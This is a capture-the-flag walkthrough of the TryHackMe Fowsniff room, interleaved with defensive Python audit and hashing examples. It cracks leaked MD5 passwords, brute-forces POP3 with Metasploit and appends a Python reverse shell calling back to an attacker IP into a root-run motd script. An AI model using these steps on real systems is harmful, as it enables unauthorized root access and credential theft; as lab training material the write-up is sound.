
Overview

This is a walkthrough of the TryHackMe room "Fowsniff CTF".

Task1

Q2.Using nmap, scan this machine. What ports are open?

Hint.nmap -A -p- -sV MACHINE_IP

Run a full port scan:

$ nmap -Pn -sC -sV -A -p- 10.10.63.67 -oN nmap_result
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 02:17 EDT
Nmap scan report for 10.10.63.67
Host is up (0.24s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry 
|_/
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL PIPELINING USER
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: SASL-IR more have IDLE post-login ENABLE listed capabilities Pre-login LITERAL+ OK ID IMAP4rev1 AUTH=PLAINA0001 LOGIN-REFERRALS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

This shows which ports are open and what is listening on them.

Port  Service  Version
22    ssh      OpenSSH 7.2p2
80    http     Apache httpd 2.4.18
110   pop3     Dovecot pop3d
143   imap     Dovecot imapd
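An added example, not part of the original walkthrough: a small Python parser for nmap's normal (-oN) output like the listing above. It rebuilds the port table and, from the pop3-/imap-capabilities script lines, flags mail services that accept plaintext logins (SASL PLAIN, USER/PASS) without advertising STLS/STARTTLS. The regexes and the finding format are my own assumptions about the -oN layout, not an nmap API; the sample input is the scan output from this page, abridged.

```python
import re

# Constructed input: the nmap -oN output from the scan above (abridged to the port lines).
NMAP_OUTPUT = """\
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL PIPELINING USER
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: SASL-IR more have IDLE post-login ENABLE listed capabilities Pre-login LITERAL+ OK ID IMAP4rev1 AUTH=PLAINA0001 LOGIN-REFERRALS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "110/tcp open  pop3    Dovecot pop3d"  -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_pop3-capabilities: ..." / "| ssh-hostkey: " -> NSE script name and its first-line output
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Return one dict per port line; NSE script lines attach to the preceding port."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(), "scripts": {}})
            continue
        m = SCRIPT_LINE.match(line)
        if m and ports:
            ports[-1]["scripts"][m.group(1)] = m.group(2).strip()
    return ports


def to_table(ports):
    """The (port, service, version) rows of the summary table."""
    return [(p["port"], p["service"], p["version"]) for p in ports]


def plaintext_mail_auth(ports):
    """POP3/IMAP services that accept a plaintext login but never offer STLS/STARTTLS."""
    findings = []
    for p in ports:
        if p["service"] not in ("pop3", "imap"):
            continue
        caps = p["scripts"].get(f"{p['service']}-capabilities", "")
        offers_tls = "STLS" in caps or "STARTTLS" in caps
        offers_plain = "PLAIN" in caps or "USER" in caps.split()
        if offers_plain and not offers_tls:
            findings.append((p["port"], p["service"]))
    return findings


if __name__ == "__main__":
    scanned = parse_nmap(NMAP_OUTPUT)
    for row in to_table(scanned):
        print("%-5d %-8s %s" % row)
    print("plaintext mail auth without TLS:", plaintext_mail_auth(scanned))
```

On this host both 110 and 143 are reported: every password sent to the mail service later in the room crosses the network in cleartext, so a capture on the path recovers it without any hash cracking. The fix on the server side is to offer STARTTLS (or implicit TLS on 995/993) and to keep Dovecot's `disable_plaintext_auth = yes`, which refuses PLAIN/USER logins on unencrypted connections.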

Q3.Using the information from the open ports. Look around. What can you find?

Port 80 serves a web page.

(Screenshot: home page.png)

The page body also states that Fowsniff Corp suffered a cyber attack in which employee information and other data leaked, and that the company's Twitter account @fowsniffcorp was taken over.

(Screenshot: page content.png)

The directory scan turned up nothing of particular interest.

$ dirsearch -u http://10.10.63.67
[03:53:28] 301 -  311B  - /assets  ->  http://10.10.63.67/assets/
[03:53:28] 200 -  471B  - /assets/
[03:53:54] 301 -  311B  - /images  ->  http://10.10.63.67/images/
[03:53:54] 200 -  507B  - /images/
[03:54:00] 200 -    6KB - /LICENSE.txt
[03:54:22] 200 -  774B  - /README.txt
[03:54:24] 200 -   26B  - /robots.txt
[03:54:26] 200 -  228B  - /security.txt

Q4.Using Google, can you find any public information about them?

Hint.There is a pastebin with all of the company employees emails and hashes. If the pastebin is down, check out TheWayBackMachine, or https://github.com/berzerk0/Fowsniff

I found the hijacked Twitter account.

The account's very first tweet contains a Pastebin link.

Its contents point to a backup link for the dumped password data.

Opening that link gives the password hashes.
The text at the same link also says they are MD5 hashes.

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Q5.Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

Cracking all of the hashes identified the passwords (stone's could not be recovered).

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4->mailcall
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56->bilbo101
tegel@fowsniff:1dc352435fecca338acfd4be10984009->apples01
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb->skyler22
seina@fowsniff:90dc16d47114aa13671c697fd506cf26->scoobydoo2
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd->unknown
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b->carp4ever
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11->orlando12
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e->07011972
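An added example (my code, not from the page or the room): it classifies lines in the leaked "user@host:hash" format as bare unsalted MD5, shows why such a dump is a lookup-table problem, and contrasts it with the salted, iterated PBKDF2 record a service should have stored instead. Only the two sample lines are copied from the dump above; the record format `pbkdf2_sha256$iterations$salt$hash` is an assumption of this example.

```python
import hashlib
import hmac
import os
import re

# Constructed sample in the leaked dump's "user@host:hash" format (values copied from the page).
LEAK_LINES = [
    "mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4",
    "seina@fowsniff:90dc16d47114aa13671c697fd506cf26",
]

MD5_HEX = re.compile(r"[0-9a-f]{32}")


def looks_like_unsalted_md5(line):
    """True when the hash field is a bare 32-hex digest with no salt or algorithm tag."""
    _user, _, digest = line.partition(":")
    return MD5_HEX.fullmatch(digest) is not None


def md5_lookup_key(password):
    """Unsalted MD5 of a password is identical for every user and every site that used it,
    which is why a precomputed table or an online lookup service resolves the dump instantly."""
    return hashlib.md5(password.encode()).hexdigest()


def store_password(password, iterations=600_000):
    """Salted, slow hash: PBKDF2-HMAC-SHA256 with a 16-byte random salt, kept as one string."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for line in LEAK_LINES:
        print(line, "-> unsalted MD5" if looks_like_unsalted_md5(line) else "-> salted/tagged")
    # Two users choosing the same password share one MD5 but get different PBKDF2 records.
    print(md5_lookup_key("mailcall") == md5_lookup_key("mailcall"))   # True
    a, b = store_password("mailcall"), store_password("mailcall")
    print(a != b, verify_password("mailcall", a), verify_password("wrong", b))  # True True False
```

The per-user salt means a leaked table cannot be resolved with one lookup per hash, and the iteration count turns each guess into real work; a dedicated password hash such as bcrypt, scrypt or Argon2 is the usual production choice, but PBKDF2 from the standard library already removes the instant-lookup property the page relies on.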

Q6.Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

Hint.In metasploit there is a packages called: auxiliary/scanner/pop3/pop3_login where you can enter all the usernames and passwords you found to brute force this machines pop3 service.

Use Metasploit's auxiliary/scanner/pop3/pop3_login to brute-force the POP3 login with the credentials obtained.

Create a username list file and a password list file:

user.txt
mauer
mustikka
tegel
baksteen
seina
stone
mursten
parede
sciana

pass.txt
mailcall
bilbo101
apples01
skyler22
scoobydoo2
carp4ever
orlando12
07011972

Set the module options and run it.

(Screenshot: metasploit options.png)

Q7.What was seina's password to the email service?

This revealed the password of the seina account.

[+] 10.10.63.67:110       - 10.10.63.67:110 - Success: 'seina:scoobydoo2' '+OK Logged in.  '

A.scoobydoo2

Q8.Can you connect to the pop3 service with her credentials? What email information can you gather?

Hint.Use netcat with the port 110 to view her emails. nc 110

Connect to port 110 with Netcat:

$ nc 10.10.63.67 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.

Two emails are in the mailbox:

Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone

Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.

Q9.Looking through her emails, what was a temporary password set for her?

The email message shows that the temporary SSH password that was set is S1ck3nBluff+secureshell.

A.S1ck3nBluff+secureshell

Q10.In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH.

SSH login succeeded with the account of baksteen, the sender of the second email.

$ ssh baksteen@10.10.63.67
baksteen@10.10.63.67's password:
baksteen@fowsniff:~$ 

Q11.Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?

Hint.cube.sh

baksteen belongs to the users group.

$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)

Searching for files owned by that group finds /opt/cube/cube.sh:

$ find / -group users -type f 2>/dev/null
/opt/cube/cube.sh

Q12.Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

Hint.Use a python reverse shell (make sure it runs as python3)

/opt/cube/cube.sh gives the users group full (rwx) permissions:

$ ls -l /opt/cube/cube.sh 
-rw-rwxr-- 1 parede users 851 Mar 11  2018 /opt/cube/cube.sh

Looking at cube.sh shows it is the banner printed on SSH login:

/opt/cube/cube.sh
printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

Append a Python reverse shell to this file:

printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.55.144",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Q13.If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!.

Hint.Run the cube file to the motd.d file.

Checking /etc/update-motd.d/00-header shows that /opt/cube/cube.sh is executed with root privileges at login:

$ ls -l /etc/update-motd.d/00-header 
-rwxr-xr-x 1 root root 1248 Mar 11  2018 /etc/update-motd.d/00-header
$ cat /etc/update-motd.d/00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

#[ -r /etc/lsb-release ] && . /etc/lsb-release

#if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
#       # Fall back to using the very slow lsb_release utility
#       DISTRIB_DESCRIPTION=$(lsb_release -s -d)
#fi

#printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

sh /opt/cube/cube.sh
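An added example, not part of the original walkthrough: a Python audit that reads a script in /etc/update-motd.d style, extracts the files it executes or sources, and reports any that a non-root account could modify. That is exactly the misconfiguration used above (a root-owned 00-header running the group-writable /opt/cube/cube.sh). The regex for `sh/bash/./source <path>` lines, the finding strings and the demo() reproduction in a temporary directory are my assumptions, not anything the page or the distribution provides.

```python
import os
import re
import stat
import tempfile

# Commands that execute or source another file: "sh /path", "bash /path", ". /path", "source /path".
# (Assumed convention for this audit; extend the alternation for other interpreters.)
EXEC_RE = re.compile(r"(?:^|[\s;&|])(?:sh|bash|\.|source)\s+(/\S+)")


def find_referenced_paths(script_text):
    """Absolute paths that a motd script runs or sources, ignoring comment lines."""
    paths = []
    for line in script_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        paths.extend(EXEC_RE.findall(line))
    return paths


def writable_by_non_root(mode, uid, gid):
    """Reason a file with this st_mode/st_uid/st_gid can be altered by a non-root user, else None."""
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & stat.S_IWGRP and gid != 0:
        return f"group-writable and owned by gid {gid}, not root"
    if mode & stat.S_IWOTH:
        return "world-writable"
    return None


def audit_motd_script(script_path):
    """(path, reason) for every file the script executes that a non-root user could change."""
    with open(script_path) as f:
        text = f.read()
    findings = []
    for path in find_referenced_paths(text):
        try:
            st = os.stat(path)
        except FileNotFoundError:
            # A dangling reference can be satisfied by anyone who can create the file.
            findings.append((path, "referenced file does not exist"))
            continue
        reason = writable_by_non_root(st.st_mode, st.st_uid, st.st_gid)
        if reason:
            findings.append((path, reason))
    return findings


def demo():
    """Constructed reproduction of the page's layout in a temp dir: a header script
    that runs a banner script which ordinary users can write to."""
    with tempfile.TemporaryDirectory() as tmp:
        banner = os.path.join(tmp, "cube.sh")
        with open(banner, "w") as f:
            f.write('printf "Fowsniff Corp - Delivering Solutions\\n"\n')
        os.chmod(banner, 0o666)  # writable by everyone, standing in for the group-writable banner
        header = os.path.join(tmp, "00-header")
        with open(header, "w") as f:
            f.write(f"#!/bin/sh\n# comment: sh /ignored\nsh {banner}\n")
        return audit_motd_script(header)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run `audit_motd_script("/etc/update-motd.d/00-header")` as root on a host to check the real file; on this machine it would report /opt/cube/cube.sh as owned by a non-root uid. The remediation is to make anything a root-run login hook executes root-owned and non-writable by others (chown root:root, chmod 755), or to inline the banner into the hook itself.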

Q14.Start a netcat listener (nc -lvp 1234) and then re-login to the SSH service. You will then receive a reverse shell on your netcat session as root!

Start a Netcat listener:

$ nc -lvnp 1234

Logging in again over SSH returns a shell as root on the listener:

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.63.67] 45222
# whoami
whoami
root

The root flag is in /root/flag.txt:

/root/flag.txt
   ___                        _        _      _   _             _ 
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
               |___/ 

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.